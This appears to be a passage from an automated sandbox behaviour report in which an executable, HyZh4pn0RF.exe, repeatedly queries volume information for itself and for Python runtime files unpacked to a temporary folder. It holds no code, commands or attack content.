Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\win32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pywin32_system32 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_queue.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_asyncio.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\_overlapped.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442\pyexpat.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI3442 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HyZh4pn0RF.exe	Queries volume information: C:\Users\user\Desktop\HyZh4pn0RF.exe VolumeInformation	Jump to behavior
